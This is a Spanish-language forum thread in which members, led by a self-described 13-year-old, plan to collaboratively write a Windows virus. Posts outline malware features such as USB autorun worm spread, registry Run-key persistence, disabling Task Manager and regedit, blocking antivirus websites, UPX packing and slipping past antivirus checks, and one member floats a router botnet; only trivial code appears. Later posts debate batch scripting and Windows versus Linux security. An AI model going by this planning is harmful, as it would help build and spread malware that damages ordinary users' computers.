PDA

Ver la versión completa : Propongo virus bat



hckr
24-05-2010, 20:47
Hola a todos. Soy un poco nuevo, para el que no me conozca. No me conozco mucho esta comunidad pero me gustaria proponer un proyecto para hacer entre todos.

Les propongo que creemos un virus bat entre todos y que cada uno vaya ofreciendo un codigo para luego juntarlo todo y hacer un virus complejo. También nos serviría de lección a todos para comprender el codigo Batch.

P.D.: Lo siento si no podía proponer o he hecho algo mal ok? :)

hckr
24-05-2010, 20:53
Después de mi presentación me gustaría explicaros mi idea:

propongo un virus con las siguientes cualidades:
1.-Lo primero que desactive el arranque a CD-ROM, para no poder formatear.
2.-Fase de ataque: llenar el disco duro, joder a mensajes...etc.
3.-Fase de "inutilización":bloquear todas las aplicaciones posibles para quitar el virus: regedit, explorer,...etc.
4.-Dar via libre a otros virus: desactivar base de firmas de virus, quitar el cebo del antivirus, inutilizar librerías de Panda, Kapersky...etc.
5.-Dar opción a utilizar Internet, ya que se cansaría del virus y cambiaría de PC.
6.-En caso de lograr quitar el virus, dar el mensaje de enhorabuena y activar otra vez el virus :D.


Si tienen dudas por mi falta de expresión pregunten, pregunten...

Fruit
24-05-2010, 22:58
1.-Lo primero que desactive el arranque a CD-ROM, para no poder formatear.

Totalmente imposible: para poder formatear hay que arrancar desde el CD-ROM antes de cargar el sistema operativo, lo cual está fuera del alcance de cualquier virus (batch o de otro tipo).


2.-Fase de ataque: llenar el disco duro, joder a mensajes...etc.

¿Qué conseguirías con eso? Llenando el disco duro absolutamente nada, jodiendo a mensajes nada tampoco (reinicio + modo a prueba de errores).


3.-Fase de "inutilización":bloquear todas las aplicaciones posibles para quitar el virus: regedit, explorer,...etc.

Totalmente inútil, léase punto 2.


4.-Dar via libre a otros virus: desactivar base de firmas de virus, quitar el cebo del antivirus, inutilizar librerías de Panda, Kapersky...etc.

Sin sentido: después de hacer todas las cosas que pretendes hacer, el usuario no podría ni encender el equipo, así que lo formatearía (punto 1).


5.-Dar opción a utilizar Internet, ya que se cansaría del virus y cambiaría de PC.

No válido, léanse los puntos 2, 3, y 4: el usuario posiblemente ni encendería el ordenador.


6.-En caso de lograr quitar el virus, dar el mensaje de enhorabuena y activar otra vez el virus :D.

Entonces no estará quitado de verdad ;)

hckr
24-05-2010, 23:04
xD me has dado una paliza, lo reconozco... Pero la intención era buena no? Además, creo que la bios está relacionada de alguna manera, por muy remota que parezca, con el sorftware o SO, pero aún así investigaré sobre el tema. Mantengo en pie la idea de crear un virus entre todos.

Fruit
24-05-2010, 23:33
Los mejores virus son los que el usuario no ve ;)
Y el batch no sirve para nada.

RaidMan
25-05-2010, 00:02
Y el batch no sirve para nada.


Discrepo.


A ver... La BIOS va aparte del S.O que tu quieras instalar en tu Disco Duro. Es un sistema operativo en si, que controla los componentes y la placa.
Va guardada en una memoria completamente diferente de la del Disco Duro, asi que no tiene relacion con el S.O.

Toquetear la BIOS tiene mucho riesgo, es mas, solo se recomienda actualizar si es completamente necesario.


El Batching es muy sencillo, muy simple, no sirve para hacer cosas tan complejas como las que tu propones. Pero eso no quiere decir que no sirva para nada. De hecho es muy util si usas Windows como Sistema Operativo. Para cacharrear al principio esta bien, pero luego deberas pasar a cosas mas complejas.



Un saludo

Fruit
25-05-2010, 00:08
El batch no puede ser considerado ni lenguaje de programación, al menos no ahora, teniendo en cuenta que lo único que hay es un emulador que no soporta ni el 20% de lo que soportaba MS-DOS 6, por ejemplo.

hckr
25-05-2010, 16:06
Fruit, con el debido respeto, te equivocas muchísimo diciendo que el Batch no sirve para nada porque, si no me equivoco, el pseudo-lenguaje Batch es un "intérprete" (no se como explicarlo) de MS-Dos. Si recuerdan todos los sistemas operativos Windows están construidos y programados basándose en MS-Dos (el gran fallo, pues deberían de cambiar la base de Windows y hacer el libro "Los pilares de Windows; xD chiste malo). Aunque las aplicaciones estén en otros lenguajes, la base de Windows es MS-Dos. Creo que nos estamos desviando del hilo del tema... en cuanto terminemos este debate seguimos con lo que propuse ok?

hckr
25-05-2010, 16:09
El Batching es muy sencillo, muy simple, no sirve para hacer cosas tan complejas como las que tu propones.


Ok tienes razón pero: ¿igualmente podríamos crear un virus entre todos, surfeando cada uno por internet y aportando su pequeño código?

RaidMan
25-05-2010, 17:42
El batch no puede ser considerado ni lenguaje de programación, al menos no ahora, teniendo en cuenta que lo único que hay es un emulador que no soporta ni el 20% de lo que soportaba MS-DOS 6, por ejemplo.


Teniendo en cuenta esta posible respuesta en ningun momento lo llame lenguaje :)

Fruit
26-05-2010, 00:53
Fruit, con el debido respeto, te equivocas muchísimo diciendo que el Batch no sirve para nada porque, si no me equivoco, el pseudo-lenguaje Batch es un "intérprete" (no se como explicarlo) de MS-Dos.

Hace muchos años que el intérprete de MS-DOS incluido con el sistema no sirve para nada. La mayoría de las funcionalidades/utilidades de MS-DOS no fueron implementadas en el intérprete (la propia palabra lo indica, no es MS-DOS, es sólo un intérprete) de MS-DOS incluido en los sistemas operativos de la familia NT (¿alguien se acuerda de CHOICE? :( )


Si recuerdan todos los sistemas operativos Windows están construidos y programados basándose en MS-Dos (el gran fallo, pues deberían de cambiar la base de Windows y hacer el libro "Los pilares de Windows; xD chiste malo). Aunque las aplicaciones estén en otros lenguajes, la base de Windows es MS-Dos.

El último sistema operativo de la familia Windows que se basó en MS-DOS fue Windows Millenium (98 con algunas mejoras como Restaurar sistema), y salió hace ya 10 años.


Creo que nos estamos desviando del hilo del tema... en cuanto terminemos este debate seguimos con lo que propuse ok?

La idea de crear un virus me parece bien, pero no en batching :)

hckr
26-05-2010, 16:03
Dios, Fruit, no sabía que supieras tanto de historia...xD Esque a mis 13 años no pretenderás que conozca Windows Millenium no? Cuando eso salió y tendría unos... ¿Cuando salió Win Millenium? Creo que tendría 1 o 2 años xD Yo toqué mi primer SO con 5 años y tenia ya mi propio PC con win XP crackeado.... ¿Qué lenguaje de programación propones? Dentro de poco me instalaré una maquina virtual para hacer las pruebas de compilación y etc ok? A lo mejor en Visual Basic o en C++... :)

P.D.: Espero que mi edad no afecte a mi trato ok? Ustedes trátenme como si no me conocieran pero pueden tutearme (hablar de tú a tú...)

Fruit
26-05-2010, 16:16
Yo recomendaría usar C. En C++ no tendría mucho sentido (un virus es procedural), en VB6 quizás algo (hace muchísimos años que no lo toco) y en VB.NET no tendría nada de sentido (ejecutables pesados, lentos, requiere la máquina virtual .NET que no está instalada por defecto en XP).

Sólo estoy dando sugerencias...

hckr
26-05-2010, 17:48
Ok podemos utilizar lo que la mayoría quiera. Si la gente conoce mejor C pues lo utilizamos. SI conocen mejor VB pues eso.

Pero el problema es que sólo 3 personas hemos posteado. Haber si la gente ve el post xD.

Gente!!! Opinen por favor xD

Fruit
26-05-2010, 18:02
Ok podemos utilizar lo que la mayoría quiera. Si la gente conoce mejor C pues lo utilizamos. SI conocen mejor VB pues eso.

¿Cómo están tus conocimientos de C? ¿Y de VB?


Pero el problema es que sólo 3 personas hemos posteado. Haber si la gente ve el post xD.

http://blog.solusan.com/wp-content/uploads/2008/05/picture-5-150x150.jpg

hckr
26-05-2010, 20:03
Dios... Ok fruit me he equivocado... Debería haber puesto A ver...xD Que si nos ponemos con el lenguaje culto....

Pues de VB lo básico: módulos, variables,etc...
De C lo único que se es compilar :p

A ver si la gente opina...;) :D

Fruit
26-05-2010, 20:11
Hace muchos años que no toco VB6, pero si quieres lo podemos intentar ;)

Forma parte de Visual Studio 6, el cual tengo en CD (también tengo el 2008 en DVD), el problema es que VS 2008 trae VB.NET y no VB6 (dos lenguajes muy muy diferentes), así que parece que tendré que intentar instalar ambos VS a la vez, a ver si hay suerte. (Buf, qué recuerdos me vas a traer :) )

hckr
26-05-2010, 20:53
Ok ok A ver si la gente empieza a responder y empezamos con la estructura al menos.

A ver, Fruit. ¿Tú qué propones para que el virus haga, cree o lo que sea?

gondar_f
27-05-2010, 13:52
Hola, me parecio interesante el hilo y os voy a comentar varias cosas:

1º El batching sigue siendo tan útil como en tiempos del DOS, es cierto que algunas características no fueron implementadas, etc. También es cierto que no es tan potente como algún lenguaje de Shell para UNIX. Pero sigue siendo tan útil y potente como en otra época. Hasta tal punto que MS esta intentando sacar un nueco interprete de comandos (el PowerShell) para dotar a los sistemas Windows de una linea de comandos moderna y potente. Hasta tal punto sigue siendo válido que las versioens Core del Windows 2008 se basan en consola. Y por cierto se pueden hacer cosas en consola que no se pueden hacer (o son más complejas en los últimos windows) desde el entorno gráfico. Yo, especialmente en tareas de administración de sistemas, lo sigo usando y es la forma mejor de trabajar. Y un administrador de sistemas que no tenga un mínimo de nociones de linea de comandos, no es un verdadero administrador de sistemas, sino alguien con un título pero que no sabe hacer nada.

2º Es cierto que desde linea de comandos o a través de un bat, de los requerimientos del virus no son factibles o no tienen sentido (para deshavilitar el CDROM, o mejor dicho DVD, CDROM solo quedan en equipos de hace 5 o más años, pues la única forma es la BIOS, lo qu ese puede deshavilitar es el autoarranque, o incluso que deje de reconocer la unidad, pero de poco sirve, además cada vez se usan menos). Per la mayoría son factibles, aunque en otros lenguajes.

3º El batching, aunque no es un lenguaje de programación al uso, en si cumple las permisas de lenguaje de programación intepretado. Por lo cual, aunque no es propiamente un lenguaje de programación si no un archivo de proceso por lotes (como script de shell en UNIX), en la práctica la diferencias es más teórica que real y seamos claros, actualmente ya muy pocos saben la diferencia teórica y en las nuevas publicaciones e incremento de prestaciones de los interpretes de comendos, pues la realidad dice que ya no hay diferencia.

4º Aunque se pudría llegar a hacer algo de la entidad que quereis en bat, en la práctica no es una buena alternativa.

5º Eso de VB 6 yo lo descartaría, por varios motivos, entre ellos que los genera ejecutables inmensos (para el tamaño óptimo de un virus) y además requiere unas librerias que usualmente se instalan cuando instalas el programa (que es el inteprete real del códe). En cuanto a VB.NET pues otro tanto de lo mismo. C es una alternativa, pero hacer lo que quereis en C sin tener unos sólido conocimientos del API de Windows, pues vais a flipar.

Una vez repasados ciertos puntos que me parecía había que repasar para aclarar temas.

Si me permitis un consejo, usad una solución intermedia a lo queriais, algo entre BAT y VB que es la mejor alternativa y es muy usado. Por que no lo haceis en vbScript. Motivos:
-Todos los windows desde el 98 integran el interprete e incluso MS para Windows Vista aumento sus prestaciones.
-Teneis el control absoluto del equipo.
-No requiere de nada adicional para que funcione.
-Es muy fácil (la sintaxis es casi idéntica a la de VB).
-Además se pueden hacer ejecutables (hay paquetes que te crean un exe o com a partir de un script en vbscript).
...
Como único punto negativo, debido a que muchos virus se basan en vbscript, pues los antivirus revisan mucho esos escript y si detectan ciertas estructuras comunes a virus, pues te lo dan como un virus, aun así si teneis un poco de cuidado, pues la comprovaciones son muy laxas porque si no no funcionarían un montón de utilidades.

Saludos

Fruit
27-05-2010, 15:08
1º El batching sigue siendo tan útil como en tiempos del DOS, es cierto que algunas características no fueron implementadas, etc. También es cierto que no es tan potente como algún lenguaje de Shell para UNIX. Pero sigue siendo tan útil y potente como en otra época.

Tú mismo lo dices todo: no se han implementado muchas de las características por lo que es algo inútil, yo sólo lo veo útil para crear simples menús para luego ejecutar programas de verdad o para hacer movimientos de archivos.


Hasta tal punto que MS esta intentando sacar un nueco interprete de comandos (el PowerShell) para dotar a los sistemas Windows de una linea de comandos moderna y potente.

PowerShell es un proyecto muy muy interesante. El problema aquí está en que hay que aprender un nuevo lenguaje, y que la PowerShell no está incluida de serie en ningún sistema operativo Windows actual (aunque puede ser instalada mediante un actualización de nivel opcional en Windows Vista y 7).


Y por cierto se pueden hacer cosas en consola que no se pueden hacer (o son más complejas en los últimos windows) desde el entorno gráfico.

Estoy en desacuerdo, de hecho, creo que la situación actual es justo la contraria.


3º El batching, aunque no es un lenguaje de programación al uso, en si cumple las permisas de lenguaje de programación intepretado. Por lo cual, aunque no es propiamente un lenguaje de programación si no un archivo de proceso por lotes (como script de shell en UNIX), en la práctica la diferencias es más teórica que real y seamos claros, actualmente ya muy pocos saben la diferencia teórica y en las nuevas publicaciones e incremento de prestaciones de los interpretes de comendos, pues la realidad dice que ya no hay diferencia.

Pero insisto en que aunque antes era potentísimo, ahora ya no es la mitad de la mitad de lo que era. Quizás te puedas escapar un poco haciendo rundll32, pero ni eso.


5º Eso de VB 6 yo lo descartaría, por varios motivos, entre ellos que los genera ejecutables inmensos (para el tamaño óptimo de un virus)

Cierto, pero se comprimen muy muy bien con sistemas como UPX (http://upx.sourceforge.net/).


y además requiere unas librerias que usualmente se instalan cuando instalas el programa (que es el inteprete real del códe).

Hasta donde yo sé, las librerías de VB6 vienen instaladas de serie en XP y superiores.


En cuanto a VB.NET pues otro tanto de lo mismo.

Los programas hechos en VB.NET requieren el .NET runtime que NO viene instalado por defecto en XP.


C es una alternativa, pero hacer lo que quereis en C sin tener unos sólido conocimientos del API de Windows, pues vais a flipar.

Estoy totalmente de acuerdo, pero de eso se trata, de aprender. O de intentarlo.


Si me permitis un consejo, usad una solución intermedia a lo queriais, algo entre BAT y VB que es la mejor alternativa y es muy usado. Por que no lo haceis en vbScript.

Pues no lo había pensado, buena idea. El problema que tiene es que deja el código fuente a la vista, por lo que el que quiera desinfectarse, lo va a tener muy fácil.


Como único punto negativo, debido a que muchos virus se basan en vbscript, pues los antivirus revisan mucho esos escript y si detectan ciertas estructuras comunes a virus, pues te lo dan como un virus, aun así si teneis un poco de cuidado, pues la comprovaciones son muy laxas porque si no no funcionarían un montón de utilidades.

Supongo que con un poco de precaución y con pasarle los antivirus habituales será suficiente.

Gracias por el tocho gondar_f :D

hckr
27-05-2010, 16:19
Chicos, si el problema es que los AV revisan con prioridad los .vbs tengo la solución.

Que sepan ustedes que VBScript y VB son compatibles (por algo es Visual Basic...xD) y se puede crear un programa con Visual Basic 6.0 que contenga una mezcla de códigos VBS y VB6, y luego comiparlo en un exe.



Cierto, pero se comprimen muy muy bien con sistemas como UPX.


Apoyo el comentario de fruit; se puede comprimir.

Ah y si nos ponemos con las faltas ortográficas...:




[...]pues la comprovaciones son muy laxas porque[...]




no tienen sentido (para deshavilitar el CDROM, o mejor dicho DVD, CDROM


http://enviayreporta.esmas.com/files/e/2009/Enero/15/2c5fe534-56f8-44af-b157-06d3342d2239_330x250.jpg

Fruit
27-05-2010, 16:58
gondar_f es un poco hoygan, pero se le perdona porque tiene unos conocimientos del tema bastante implacables :D

gondar_f
28-05-2010, 00:24
Tú mismo lo dices todo: no se han implementado muchas de las características por lo que es algo inútil, yo sólo lo veo útil para crear simples menús para luego ejecutar programas de verdad o para hacer movimientos de archivos.
Pues te equivocas completamente, tal vez porque tu asta ahora solo te has manejado en equipos para uso domestico y a lo sumo en redes de unos pocos equipos, o no sueles usar versiones para servidores (estoy especulando). Porque su utilidad actual no es para crear menus si no para cosas (muchas veces más sencillas) serias. Y te sorprenderías lo útil que puede ser un bat de un par de lineas, desde un pequeño bat para crear unidades de red (tu solo pones a disposición de todos el bat y ellos lo ejecutan y listo una unidad de red configurada en su equipo sin necesidad de que sepan nada), pasando por un bat para crear una serie de users automáticamente... Lo que pasa es que en los NT no se basan en un núcleo DOS y su terminal aunque imita a la del DOS, es distinta, igual que en Linux hay varios shells, pues el de los NT y el de los DOS/Windows 9x pues son totalmente diferentes.

Y repito, tal es que las versiones Windows 2008 Core hay que administrarlas desde la consola, tras muchos años MS volvio a la consola. Y no estamos hablando de las versiones básicas, si no de las más caras.

Lo que pasa es que actualmente la gente se ha olvidado de la consola y casi todos los manuales pues son simples y se quedan en 4 comandos del DOS y un par de estructuras de control. Aunque en internet hay info a patadas, suele estar muy segmentada y no es facilmente aprovechable y por tanto solo sirve para el que ya tiene la base. Y ya no digamos entrar en temas serios como los comandos NET (net share, net user...) y 20 más que es en donde entramos en materia muy interesane y potente. Además parece que ha quedado relegada a users que llevan muchos años, o user de muy avanzados y administradores de sistemas. Para todos los demás parece que ya no existe o no sirve para nada.


PowerShell es un proyecto muy muy interesante. El problema aquí está en que hay que aprender un nuevo lenguaje, y que la PowerShell no está incluida de serie en ningún sistema operativo Windows actual (aunque puede ser instalada mediante un actualización de nivel opcional en Windows Vista y 7).
También te equivocas, por lo menos en algunas versiones para servidor si ya viene de serie. Aunque es cierto, para usarlo en un Windows para entorno domestico o Workstation, aun suele haber que instalarlo de forma adicional. Pero es que es un producto de futuro para sustituir la alctual consola en la decada que comenzo este año, y no vendrá de serie en todos los windows hasta el NT 7 que salga en el 2013 o por ahí.


Estoy en desacuerdo, de hecho, creo que la situación actual es justo la contraria.
Tal vez lo que necesitas es echarle un ojo a un buen manual de administración de sistemas. Pero incluso usando los viejos comandos, estos te pueden sacar de más de un apuro. Por ejemplo yo me encuentro con mucha gente que no puede borrar un puto archivo porque esta protegido como lectura, sistema... pues en linea de comandos cambias los atributos con attrib en 2 segundos y un del y listo. También se puede hacer en entorno gráfico, pero por ejemplo en el Vista y Win 7, en muchos casos tienes que arrancar en un modo seguro o similar para poder hacerlo, mientras que si lo hacer por consola no necesitas para nada reiniciar el equipo.


Los programas hechos en VB.NET requieren el .NET runtime que NO viene instalado por defecto en XP.
Por eso lo decia, además no hay un solo framework, si no varios.


Pues no lo había pensado, buena idea. El problema que tiene es que deja el código fuente a la vista, por lo que el que quiera desinfectarse, lo va a tener muy fácil.

Hay compiladores que te crean exe o com a partir del archivo, además que realmente aunque fuera como un archivo con extensión vbs, pues tampoco cambia nada.


Que sepan ustedes que VBScript y VB son compatibles (por algo es Visual Basic...xD) y se puede crear un programa con Visual Basic 6.0 que contenga una mezcla de códigos VBS y VB6, y luego comiparlo en un exe.

Totalmente cierto y no solo en VB, yo tengo echas pequeñas utilidades en VB.NET que recurrian a vbscript incrustado para hacer lo que sería dificil de otra forma.

Saludos

Fruit
28-05-2010, 00:49
Pues te equivocas completamente, tal vez porque tu asta ahora solo te has manejado en equipos para uso domestico y a lo sumo en redes de unos pocos equipos, o no sueles usar versiones para servidores (estoy especulando).

No es mi interés infectar servidores ;)


Porque su utilidad actual no es para crear menus si no para cosas (muchas veces más sencillas) serias. Y te sorprenderías lo útil que puede ser un bat de un par de lineas, desde un pequeño bat para crear unidades de red (tu solo pones a disposición de todos el bat y ellos lo ejecutan y listo una unidad de red configurada en su equipo sin necesidad de que sepan nada), pasando por un bat para crear una serie de users automáticamente...

Lo que he dicho yo: que el batch es muy dependiente de programas que son realmente los que hacen "la faena". Por ejemplo, si necesitásemos abrir, modificar y guardar una clave del registro tendríamos que crear un archivo .reg temporal y hacer que regedit lo importe.


Y repito, tal es que las versiones Windows 2008 Core hay que administrarlas desde la consola, tras muchos años MS volvio a la consola. Y no estamos hablando de las versiones básicas, si no de las más caras.

No es mi interés infectar servidores ;)


También te equivocas, por lo menos en algunas versiones para servidor si ya viene de serie. Aunque es cierto, para usarlo en un Windows para entorno domestico o Workstation, aun suele haber que instalarlo de forma adicional. Pero es que es un producto de futuro para sustituir la alctual consola en la decada que comenzo este año, y no vendrá de serie en todos los windows hasta el NT 7 que salga en el 2013 o por ahí.

No es mi interés infectar servidores del futuro ;)

clarinetista
28-05-2010, 02:55
gondar_f es un poco hoygan, pero se le perdona porque tiene unos conocimientos del tema bastante implacables :D
A ver cuadrilla de cenutrios, lo que gondar_f es, es gallego, culturizaos un poco hombre.......... :mad:

Fruit
28-05-2010, 03:01
A ver cuadrilla de cenutrios, lo que gondar_f es, es gallego, culturizaos un poco hombre.......... :mad:

clarinetista, ¿te he dicho alguna vez que te amo?

clarinetista
28-05-2010, 09:47
clarinetista, ¿te he dicho alguna vez que te amo?
Es posible, no lo recuerdo :0=

hckr
28-05-2010, 16:17
-.-" Gondar te tomaste a mal mi comentario? Si te sentó mal lo siento, y hablas conmigo. Que yo sepa solo resalté las faltas de ortografía que tuvistes como "Comprovación" y otra más. Si tienes algun problema con mi comentario, enséñame la parte de las normas del foro donde venga "decir las faltas ortográficas de un moderador". En mi pueblo eso es abuso de poder: Fruit me lo ha hecho. Vean su comentario con la foto. ¿Me he quejado? NO. Es más, me lo he tomado a broma y he puesto en negrita todas las veces la palabra que fallé xD. ¿Me equivoco Fruit? Que sepa usted, Don/ Doña Moderador/a, que un moderador no borra mensajes por capricho. Se lo comunicaré al administrador, a ver que opina. Que sepa todo el mundo que este moderador/a ha borrado un mensaje entero, con una respuesta a una "pregunta" que me había currado buscando por internet y libros de mi casa. Espero que no me banee usted por eso...xD


Atentamente, HcKr.

hckr
28-05-2010, 16:20
Ya subiré la captura con la prueba del delito...xD

Fruit
28-05-2010, 16:31
Que alguien traiga la buaaaaaaaaaaambulancia.

Atentamente, Michael Jackson.

hckr
28-05-2010, 17:23
Chicos perdonenme porque no vi mi mensaje, que estaba en la pagina 2 y creí que el moderador lo había borrado. Pido muchas disculpas, gondar_f y a los demás.

Fruit
28-05-2010, 17:31
Mejor borra lo que has escrito o podrías aparecer muerto por culpa de la mafia de HACKHiSPANO :D

En fin, nos estamos saliendo del tema. ¿Qué quieres que haga el virus exactamente, hckr?

hckr
28-05-2010, 18:03
Que proponeis vosotros? me gustaria que fuera un virus que no permitiera el acceso a Internet ni al regedit no al AV y si se puede, que desactive la base de firmas de virus del AV. ¿En que lenguaje quedamos?

Fruit
28-05-2010, 18:06
Hay que diferenciar entre un virus que joda gratuitamente y un virus que consiga sus objetivos sin que el usuario lo note. Un virus que impida el acceso a Internet no tiene mucho sentido, el usuario lo que haría sería formatear en poco tiempo.

proteo1
28-05-2010, 20:14
Bueno el tema y la idea.

Si es por Batch pongo una linea

@Echo Off

Ahora si es por VB o algun EXE cualquiera me lo mandan ya comprimido con UPX o yo lo comprimo mas aparte lo oculto el compresor.

hckr
29-05-2010, 03:00
-.-" Se pone sin las mayúsculas. Es @echo off no @Echo Off

Ah y mejor lo compilo y comprimo yo en mi máquina virtual donde probaremos todos los virus y códigos ok? Dejad las tonterías. Hace falta un esquema de funciones y funcines del virus. :D

Fruit
29-05-2010, 03:08
En realidad, hckr, es @ECHO OFF :)

Por cierto, el esquema lo tienes que poner tú y de momento no parece que tengas mucha idea.

RaidMan
29-05-2010, 05:14
Como si lo quereis poner "@EcHO OFf" No es Case Sensitive.


Haya paz. Que la calma no se pierda.
Hckr, propon un esquema a seguir y veremos como se puede crear un codigo que desde VB lo lance a traves del interprete de DOS (es asi como lo querias, no?)

Si no recuerdo mal era algo asi:

SHELL("cmd /c COMANDO ")


Un saludo

gondar_f
29-05-2010, 11:42
Gondar te tomaste a mal mi comentario? Si te sentó mal lo siento, y hablas conmigo. Que yo sepa solo resalté las faltas de ortografía que tuvistes como "Comprovación" y otra más. Si tienes algun problema con mi comentario, enséñame la parte de las normas del foro donde venga "decir las faltas ortográficas de un moderador".
tranquilo, no paso nada, pere debes tener más cuidado con acusar a nadie sin estar seguro, te evitaras muchos problemas.

en cuanto al tema, pues si me permitis unos consejos:

1º empezar por algo más sencillo, poe ejemplo el tipico gusano de las USB, por ejemplo en vbscript son un par de decenas de lineas de code y a partir de él podreis añadir más funcionalidad.

2º lo primero es que decidais que vais a hacer, en que lenguaje, que conocimientos teneis para empezar y por tanto que necesitas saber...

Depede lo que decidais hacer y en que lenguaje, pues a lo mejor os ayudo.

Saludos

PD: fruit me voy a poner celoso XD

hckr
29-05-2010, 13:04
Pues no se chicos... El esuqema podría ser una cosa así (no se el orden correcto):

1.-Lo primero reproducirse en USB, System 32, y en otras carpetas.
2.-Luego, crear lo que es el virus, que podría ser unas ventanas al encender del tipo: "Flata el archivo MsDhgkrS.dll (inventado...xD). También un shutdown de unos... 2 minutos o cosa así (en realidad más como 10 min...)
3.-Clave Run del registro para que se active al encender.
4.-Bloqueo de programas: bloquear regedit, avg...
5.-Creo que se pueden bloquear webs: softonic, pandacloud, panda, avast, rapidshare, megaupload,... y otras webs de descargas.


P.D.: el punto uno debería ir después del punto 2 porque si no hay virus no puede reproducirse...xD

la idea es un archivo general (el primer virus) que luego cree a partir de su código otros virus de código claro, reproducirse y ejecutarse.


Opinen!

Fruit
29-05-2010, 17:19
Y dale con bloquear todas las webs, mira que eres pesado, si lo que quieres es joder ordenadores mejor les das con un martillo y así acabas antes...

hckr
29-05-2010, 20:40
Es que, a ver Fruit, no toda la gente tiene amigos informaticos o sabe lo que es formatear. También por muy bueno que sea el virus, si le ha tocado a un licenciado en Seguridad Informática, lo va a quitar igualmente. Hay que pensar por la mayoría general. Digo lo de desactivar esas webs porque una amiga mía tenía un virus y no podía entrar en rapidshare ni nada, supongo para que no descargue un antivirus y quite el virus. ¿Lo entiendes ya? ;)

A la demás gente que le parece?

Fruit
30-05-2010, 00:01
Pero vamos a ver, alma de cántaro, que no te enteras. Regla de oro:

El usuario no debe enterarse de que tiene un virus.

Lo puedo poner más grande si quieres.

gondar_f
31-05-2010, 00:54
Vamos a ver, empezar por lo básico, uno que se reproduzca en unidades flash, como el clásico autorun (en cristiano, un archivo autorun.inf y un virus.vbs), sobre ese después le agregais que modifique el registro para que deshavilite el administrador de tareas para el usuario actual y que autoaranque al encender (esto es chupado). Posteriormente que apague el equipo a cierta hora. El siguiente paso sería bajar privilegios al usuario (no es tan fácil, pero modificando el registro se puede conseguir). El clásico sistema de desarrollo basado en prototipos por refinamiento sucesivo, mejorando en cada nueva versión.

Bien, para empezar ya teneis parte del code (si lo haces en vbscript) en el último número de la ezine, buscais en mi artículo de vbscript y teneis code sobre el que podeis poneros a trabajar (realmente hay un script que puede serviros de base, si mal no recuerdo). Además de paso aprendeis un poco de vbscript que os hara falta.

Además para que esto sirva para otros dentro de un tiempo, pues aprovechamos y así vamos haciendo un artículo para el próximo número. Vais a ir escribiendo todo el proceso y posteriormente lo redactamos como un artículo y lo publicamos con todos los que participemos como autores. Por supuesto si estais conformes.

Saludos

hckr
31-05-2010, 17:18
Hola, me parece bien.

fikus
31-05-2010, 19:19
xo que funcionamiento quereis que tenga este virus? para que?
troyano,bot,keylogger...?
a mi me intereseria mucho hacer un botnet para routers (desde ke vi el supervirus CHUCK NORRIS ke iba colandose a routers y usandolos de bot)
seria interesante, ya que ahi no entra un antivirus ni lo van a formatear

hckr
31-05-2010, 19:26
un botnet? En VB? u.U empecemos por algo mas sencillo no? xD

Fruit
31-05-2010, 20:29
Una botnet es de lo más fácil que hay.

proteo1
31-05-2010, 23:10
-.-" Se pone sin las mayúsculas. Es @echo off no @Echo Off

Ah y mejor lo compilo y comprimo yo en mi máquina virtual donde probaremos todos los virus y códigos ok? Dejad las tonterías. Hace falta un esquema de funciones y funcines del virus. :D


En realidad, hckr, es @ECHO OFF :)

Por cierto, el esquema lo tienes que poner tú y de momento no parece que tengas mucha idea.

Gracias por sus comentarios, quiza por la version de mi Windows funciona asi, y en el de uds funciona de otra manera, creo que bajare el parche de "hckr" para que no haya mayor problema, :D y mis demas BATCHS puedan correr en multiplataformas de windows sin problemas (es sarcasmo todo esto) jejeje,

y tbm digo PAZ esto es foro de comunicacion, soporte, ayuda y guia.

gondar_f
03-06-2010, 19:14
Bueno, a lo mejor este finde os hago yo el núcleo de un programa autoreplicante en vbscript para que empeceis a trabajar a partir de él.

hckr
04-06-2010, 12:13
Ok grax gondar :D

hystd
04-06-2010, 14:05
Las 1000 maneras de joder Windows... Microsoft recompensa a las ideas más originales con premios a los 3 primeros puestos... El slogan del concurso es: "Demuestra la robustez de nuestro SO".

Un saludo.

RaidMan
04-06-2010, 16:28
Solo 1000???

hckr
04-06-2010, 17:36
jaja claro que hay + de 1000. Con el admin abierto, cosa que no ocurre en linux, se pueden hacer muchas combinaciones. 1000 son pocas... :D

gondar_f
05-06-2010, 00:08
En linux lo mismo, incluso puede que más viendo distirbuciones como Ubuntu. Pero el primero y más peligroso problema de seguridad es el usuario. Y en otra era los de linux como solian ser users de cierto lvl y el SO era más controlado por muchos ojos (algo que hoy en día aunque en teoría sigue igual, en la práctica con tantas distribuciones, todos distintas... pues yo pondría en duda), ahora Linux es igual que windows, solo hay un punto que lo sigue protegiendo mucho y es que sigue siendo minoritario. Porque hoy en día hay el mismo porcentaje de users flojos en Linux que ne windows, con la diferencia de que se creen que Linux es seguro (la peor inseguridad es la falsa seguridad).

Saludos

hckr
05-06-2010, 01:17
en realidad, gondar, linux es seguro por el sistema de permisos que utiliza, y porque para ejecutar un comando administrativo, (aunque tu cuenta sea root) te pide la contraseña. Otra cosa es que las tripas de windows están al descubierto y tiene lectura y escritura completa del disco duro. Linux tiene el sistema de permisos que sólo te deja modificar o escribir por línea de comandos, es decir, pidiéndote la pass. En caso de infección en linux, inmediatamente sale un parche de actualización de seguridad.

Aún así, los escritores de virus no escriben para linux porque nadie lo utiliza...


Linux será bueno, rápido, seguro...etc, pero no puedo vivir sin nuestro querido Windows... :D

Fruit
05-06-2010, 02:02
en realidad, gondar, linux es seguro por el sistema de permisos que utiliza, y porque para ejecutar un comando administrativo, (aunque tu cuenta sea root) te pide la contraseña.

Linux no te vuelve a pedir la contraseña para nada una vez te haces root.


Otra cosa es que las tripas de windows están al descubierto y tiene lectura y escritura completa del disco duro.

Una cosa es que la mayoría de los usuarios de Windows usen una cuenta administrativa para el día a día, pero eso no está bien. Windows tiene cuentas de usuario restringidas y administrativas (de hecho es muchísimo más configurable: prueba a escribir lusrmgr.msc en el menú Ejecutar). Y soporta ACL (listas de acceso) personalizadas por cada archivo. Eso no es posible en GNU/Linux nativamente. Pero me parece que SELinux hace algo parecido.


Linux tiene el sistema de permisos que sólo te deja modificar o escribir por línea de comandos, es decir, pidiéndote la pass.

:confused:


En caso de infección en linux, inmediatamente sale un parche de actualización de seguridad.

En Windows también, ¿no conoces Windows Update?


Aún así, los escritores de virus no escriben para linux porque nadie lo utiliza...

Además el sistema de permisos usado por defecto es más seguro. Pero aún así, las cosas se cuelan a veces sobre todo por usuarios inexpertos, como ejemplo pongo ésto que pasó hace muy poco tiempo (http://linux.slashdot.org/story/09/12/09/2215253/Malware-Found-Hidden-In-Screensaver-On-Gnome-Look).

hckr
05-06-2010, 02:29
